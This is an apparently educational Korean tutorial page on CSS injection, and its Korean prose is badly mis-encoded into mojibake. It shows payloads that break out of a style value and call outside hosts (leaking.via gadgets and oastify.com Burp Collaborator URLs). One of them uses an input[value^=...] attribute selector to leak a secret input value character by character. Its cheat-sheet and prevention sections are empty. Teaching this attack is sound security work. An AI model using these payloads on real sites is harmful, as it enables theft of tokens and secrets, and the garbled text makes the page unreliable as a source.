CSS Injection

CSS Injection


๐Ÿ”Ž What is CSS Injection?

Cascading Style Sheet(CSS)๋Š” HTML๋กœ ์ •์˜๋œ ๋ฌธ์„œ๋ฅผ ๋‹ค์ฑ„๋กญ๊ฒŒ ํ•˜๋Š” ์—ญํ™œ์„ ํ•ฉ๋‹ˆ๋‹ค. ํ‘œํ˜„์— ์‚ฌ์šฉ๋  ์ž„์˜์˜ CSS ์ฝ”๋“œ๋ฅผ ์ฃผ์ž…์‹œ์ผœ ์˜๋„ํ•˜์ง€ ์•Š์€ ์†์„ฑ์ด ์ •์˜๋˜๋Š” ๊ฒƒ์„ CSS Injection ์ด๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค.
CSS Injection์€ XSS์™€ ๋น„์Šทํ•˜๊ฒŒ ์›น ํŽ˜์ด์ง€ ๋กœ๋”ฉ ์‹œ ์•…์˜์ ์ธ ๋ฌธ์ž์—ด์„ ์‚ฝ์ž…ํ•˜์—ฌ ์•…์˜์ ์ธ ๋™์ž‘์„ ์ด๋„๋Š” ๊ณต๊ฒฉ์œผ๋กœ ๊ณต๊ฒฉ์ž๊ฐ€ ์ž„์˜ CSS ์†์„ฑ์„ ์‚ฝ์ž…ํ•ด ์›นํŽ˜์ด์ง€์˜ UI๋ฅผ ๋ณ€์กฐํ•˜๊ฑฐ๋‚˜ CSS ์†์„ฑ์˜ ๋‹ค์–‘ํ•œ ๊ธฐ๋Šฅ์„ ํ†ตํ•ด ์›น ํŽ˜์ด์ง€๋‚ด์˜ ๋ฐ์ดํ„ฐ๋ฅผ ์™ธ๋ถ€๋กœ ํ›”์น  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
๋ฐ์ดํ„ฐ์˜ ์˜ˆ๋กœ๋Š” CSRF Token, ํ”ผํ•ด์ž์˜ API Key๋“ฑ ์›น ํŽ˜์ด์ง€์— ์ง์ ‘์ ์œผ๋กœ ๋ณด์—ฌ์ง€๋Š” ๊ฐ’์ฒ˜๋Ÿผ CSS ์„ ํƒ์ž๋ฅผ ํ†ตํ•ด ํ‘œํ˜„์ด ๊ฐ€๋Šฅํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
๊ทธ๋ž˜์„œ CSS ์„ ํƒ์ž๋กœ ํ‘œํ˜„์ด ๋ถˆ๊ฐ€๋Šฅํ•œ script ํƒœ๊ทธ ๋‚ด ๋ฐ์ดํ„ฐ๋“ค์€ ํƒˆ์ทจํ•  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.
CSS Injection์€ HTML (style) ์˜์—ญ์— ๊ณต๊ฒฉ์ž๊ฐ€ ์ž„์˜ ์ž…๋ ฅ ๊ฐ’์„ ๋„ฃ์„ ์ˆ˜ ์žˆ๊ฑฐ๋‚˜ ์ž„์˜ HTML์„ ์‚ฝ์ž…ํ•  ์ˆ˜ ์žˆ์ง€๋งŒ Content-Security-Policy(CSP)๋กœ ์ธํ•ด ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์—†๋Š” ๋“ฑ ๋‹ค์–‘ํ•œ ์ƒํ™ฉ์—์„œ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

CSS Injection

    1. ์ƒ‰๊น” ๋ฐ”๊พธ๊ธฐ

CSS Injection์„ ํ†ตํ•ด ์ž„์˜ ์˜์—ญ์˜ UI๋ฅผ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ์ฝ”๋“œ๋Š” ์ด์šฉ์ž๋กœ๋ถ€ํ„ฐ theme ๊ฐ’์„ ์ž…๋ ฅ ๋ฐ›์•„ style ํƒœ๊ทธ ๋‚ด์— ์ถœ๋ ฅํ•˜๋Š” ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ ์ž…๋‹ˆ๋‹ค. theme๊ฐ’ ๋‚ด์— < ๋ฅผ ์ž…๋ ฅํ•  ์ˆ˜ ์—†์–ด ์ •์˜๋œ style ํƒœ๊ทธ๋ฅผ ๋ฒ—์–ด๋‚˜๋Š” ๊ฒƒ์€ ๋ถˆ๊ฐ€๋Šฅํ•˜์—ฌ CSS ์†์„ฑ๋งŒ ์ถœ๋ ฅํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
body์˜ background-color ๊ฐ€ ์•„๋‹Œ h1์˜ ๊ธ€์”จ ์ƒ‰์„ ๋ณ€๊ฒฝํ•˜๋ ค๋ฉด } ๋ฌธ์ž๋ฅผ ์ด์šฉํ•ด ๊ธฐ์กด ์†์„ฑ์„ ํƒˆ์ถœํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
yellow; } h1 { color : red ๊ฐ’์„ ์ž…๋ ฅ ์‹œ h1์˜ ๊ธ€์”จ ์ƒ‰๊น” ๋ณ€๊ฒฝ์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค.

body { background-color: ${theme}; }
<h1>Hello, it's dreame. Interesting with CSS Injection?</h1>
if '<' in theme:


    1. IP Ping Back ํ•˜๊ธฐ

ํด๋ผ์ด์–ธํŠธ์‚ฌ์ด๋“œ ๊ณต๊ฒฉ์„ ํ†ตํ•ด ๋ฐ์ดํ„ฐ๋ฅผ ์™ธ๋ถ€๋กœ ํƒˆ์ทจํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” ๊ณต๊ฒฉ์ž์˜ ์„œ๋ฒ„๋กœ ์š”์ฒญ์„ ๋ณด๋‚ผ ์ˆ˜ ์žˆ์–ด์•ผํ•ฉ๋‹ˆ๋‹ค. CSS ์†์„ฑ์œผ๋กœ ์™ธ๋ถ€ ์š”์ฒญ(Ping Back)์„ ํ•˜๊ธฐ ์œ„ํ•ด CSS ์™ธ๋ถ€ ๋ฆฌ์†Œ์Šค๋ฅผ ๋ถˆ๋Ÿฌ์˜ค๋Š” ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.
๋‹ค๋ฅธ ์‚ฌ์ดํŠธ์˜ ์ด๋ฏธ์ง€,ํฐํŠธ ๋“ฑ์„ ๊ฐ€์ ธ์˜ค๋Š” ์—ฌ๋Ÿฌ ๋ฐฉ๋ฒ•์ด ์กด์žฌํ•˜์ง€๋งŒ ๋Œ€ํ‘œ์ ์œผ๋กœ cure53์˜ HTTPLeaks(https://github.com/cure53/HTTPLeaks/blob/main/leak.html#L266) ๊ฐ€์ ฏ์„ ์ด์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

CSS ๊ฐ€์ ฏ ์„ค๋ช…
@import โ€˜https://leaking.via/css-import-stringโ€™; ์™ธ๋ถ€ CSS ํŒŒ์ผ์„ ๋กœ๋“œํ•ฉ๋‹ˆ๋‹ค. ๋ชจ๋“  ์†์„ ์ค‘ ๊ฐ€์žฅ ์ƒ๋‹จ์— ์œ„์น˜ํ•ด์•ผ ํ•˜๋นˆ๋‹ค. ๊ทธ๋ ‡์ง€ ์•Š์„ ๊ฒฝ์šฐ @import๋Š” ๋ฌด์‹œ๋ฉ๋‹ˆ๋‹ค.
@import url(https://leaking.via/css-import-url); url ํ•จ์ˆ˜๋Š” URL๋ฅผ ๋ถˆ๋Ÿฌ์˜ค๋Š” ์—ญํ™œ์„ ํ•ฉ๋‹ˆ๋‹ค. ์ƒํ™ฉ์— ๋”ฐ๋ผ์„œ ์„ ํƒ์ ์œผ๋กœ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
@background: url(https://leaking.via/css-background); ์š”์†Œ์˜ ๋ฐฐ๊ฒฝ์„ ๋ณ€๊ฒฝํ•  ๋•Œ ์‚ฌ์šฉํ•  ์ด๋ฏธ์ง€๋ฅผ ๋ถˆ๋Ÿฌ์˜ต๋‹ˆ๋‹ค.
@font-face {font-family:leak; src: url(https://leaking.via/css-font-face-src);} ๋ถˆ๋Ÿฌ์˜ฌ ํฐํŠธ ํŒŒ์ผ์˜ ์ฃผ์†Œ๋ฅผ ์ง€์ •ํ•ฉ๋‹ˆ๋‹ค.
background-image: \000075\000072\00006C(https://leaking.via/css-escape-url-2); CSS ์—์„œ ํ•จ์ˆ˜๋ฅผ ํ˜ธ์ถœํ•  ๋•Œ asciiํ˜•ํƒœ์˜ โ€œurlโ€์ด ์•„๋‹Œ hex ํ˜•ํƒœ์ธ โ€œ\000075\000072โ€๋„ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค.
  1. ์œ„ ๊ฐ€์ ฏ ์ค‘ ํ•˜๋‚˜๋ฅผ ์‚ฌ์šฉํ•ด ํŽ˜์ด์ง€ ๋‚ด์—์„œ ์™ธ๋ถ€ ์„œ๋ฒ„๋กœ ์š”์ฒญ์„ ๋ณด๋‚ผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์š”์ฒญ์„ ๋ฐ›์„ ์„œ๋ฒ„๋Š” Burp๋ฅผ ์‚ฌ์šฉํ•ด ์ค๋‹ˆ๋‹ค.
  2. ๊ฐœ๋ฐœ์ž ๋„๊ตฌ๋ฅผ ์ด์šฉํ•ด Netwrok ํƒญ์—์„œ ์š”์ฒญ ๊ธฐ๋ก์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.
  3. yellow; background: url(โ€œhttps://ovns6ytyf0w22l1r67eo52d3yu4lsa.oastify.com/ping-backโ€); ์„ ์ž…๋ ฅํ•˜์—ฌ ์„œ๋ธŒ ๋„๋ฉ”์ธ ์ฃผ์†Œ๋กœ body์˜ background๋ฅผ ์„ค์ •ํ•ฉ๋‹ˆ๋‹ค.
  4. ๊ฐœ๋ฐœ์ž ๋„๊ตฌ์—์„œ burp ์„œ๋ฒ„๋กœ ๋ณด๋‚ธ ์š”์ฒญ์„ ํ™•์ธํ•˜๊ณ  ๋ฒ„ํ”„์—์„œ ๋ฐ›์€ ์š”์ฒญ์„ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.


image image

    1. ๋ฐ์ดํ„ฐ ํƒˆ์ทจ

1,2์—์„œ๋Š” ์†์„ฑ์„ ์ถ”๊ฐ€ํ•˜๊ฑฐ๋‚˜ ๋ณ€๊ฒฝ, CSS Selector์˜ ์กฐ๊ฑด์ด ๋งž์„ ๊ฒฝ์šฐ ์™ธ๋ถ€ ์„œ๋ฒ„๋กœ ์š”์ฒญ์„ ๋ณด๋ƒˆ๋Š”๋ฐ ์ด๋ฒˆ์—๋Š” Attribute Selector๋ฅผ ํ†ตํ•ด ์ž…๋ ฅ ๋ฐ•์Šค(Input)์˜ ๊ฐ’(Value)๋ฅผ ํƒˆ์ทจํ•˜๋Š” ๋ฐฉ๋ฒ• ์ž…๋‹ˆ๋‹ค.

CSS Attribute Selector(ํŠน์„ฑ ์„ ํƒ์ž)
CSS Attribute Selector์€ Element์˜ Attribute๋ฅผ Selectionํ•  ์ˆ˜ ์žˆ๋Š” ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•ฉ๋‹ˆ๋‹ค.

๊ตฌ๋ฌธ ์„ค๋ช…
[attr] attr ์ด๋ผ๋Š” ์ด๋ฆ„์˜ ํŠน์„ฑ์„ ๊ฐ€์ง„ ์š”์†Œ๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค.
[attr=value] attr ์ด๋ผ๋Š” ์ด๋ฆ„์˜ ํŠน์„ฑ๊ฐ’์ด ์ •ํ™•ํžˆ value์ธ ์š”์†Œ๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค.
[attr~=value] attr์ด๋ผ๋Š” ์ด๋ฆ„์˜ ํŠน์„ฑ๊ฐ’์ด ์ •ํ™•ํžˆ value์ธ ์š”์†Œ๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค. attr ํŠน์„ฑ์€ ๊ณต๋ฐฑ์œผ๋กœ ๊ตฌ๋ถ„ํ•œ ์—ฌ๋Ÿฌ ๊ฐœ์˜ ๊ฐ’์„ ๊ฐ€์ง€๊ณ  ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
[attr^=value] attr์ด๋ผ๋Š” ํŠน์„ฑ๊ฐ’์„ ๊ฐ€์ง€๊ณ  ์žˆ์œผ๋ฉฐ, ์ ‘๋‘์‚ฌ๋กœ value๊ฐ€ ๊ฐ’์— ํฌํ•จ๋˜์–ด ์žˆ์œผ๋ฉด ์ด ์š”์†Œ๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค.
[attr$=value] attr์ด๋ผ๋Š” ํŠน์„ฑ๊ฐ’์„ ๊ฐ€์ง€๊ณ  ์žˆ์œผ๋ฉฐ, ์ ‘๋ฏธ์‚ฌ๋กœ value๊ฐ€ ๊ฐ’์— ํฌํ•จ๋˜์–ด ์žˆ์œผ๋ฉด ์ด ์š”์†Œ๋ฅผ ์„ ํƒํ•ฉ๋‹ˆ๋‹ค.

์œ„ ๊ตฌ๋ฌธ์ค‘ [attr^=value] ์„ ์ด์šฉํ•˜๋ฉด ์ž…๋ ฅ ๋ฐ•์Šค ๋‚ด์šฉ์„ ํƒˆ์ทจํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

  1. [attr^=value] ๊ตฌ๋ฌธ์„ ์ด์šฉํ•ด ๊ฐ€์žฅ ์ฒซ ํ•œ๊ธ€์ž๋ฅผ ๋จผ์ € ํƒˆ์ทจํ•ฉ๋‹ˆ๋‹ค.
  2. 1์—์„œ ํƒˆ์ทจํ•œ ๊ธ€์ž๋ฅผ ์ ‘๋‘์‚ฌ๋กœ ๊ทธ ๋‹ค์Œ ํ•œ๊ธ€์ž๋ฅผ ํƒˆ์ทจํ•ฉ๋‹ˆ๋‹ค.
  3. 1-2๋ฅผ ๋ฐ˜๋ณตํ•ฉ๋‹ˆ๋‹ค.

์œ„ ์ˆœ์„œ๋ฅผ ์ง„ํ–‰ํ•˜๋Š” ํŽ˜์ด๋กœ๋“œ๋Š” yellow; } input[value^=S3CR3T_] { background: url(โ€œhttps://ar5e2kpkbmsoy7xd2taa1o9pug08ox.oastify.com/lolsโ€); ๋กœ ๊ฐœ๋ฐœ์ž ๋„๊ตฌ Network ํƒญ์„ ํ™•์ธํ•˜์—ฌ ํƒˆ์ทจํ•˜๋ ค๊ณ  ํ•˜๋Š” ๋‚ด์šฉ์ด S3CR3T_์œผ๋กœ ์‹œ์ž‘๋˜๋Š”๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
๊ฐ’์ด ์ผ์น˜ํ• ๊ฒฝ์šฐ Networkํƒญ์— ๊ฐ’ ์ „์†ก ๋ฐ ์„œ๋ฒ„ ํ™•์ธ ๊ฐ€๋Šฅ, ์ผ์น˜ํ•˜์ง€ ์•Š์„ ๊ฒฝ์šฐ ๊ฐ’์ด ์ „์†ก๋˜์ง€ ์•Š์Œ


๐Ÿ Cheat sheet

๐Ÿ‘€ How to Prevent ?

๐Ÿ“ƒ References

  • https://dreamhack.io/lecture/courses/327
  • https://infosecwriteups.com/exfiltration-via-css-injection-4e999f63097d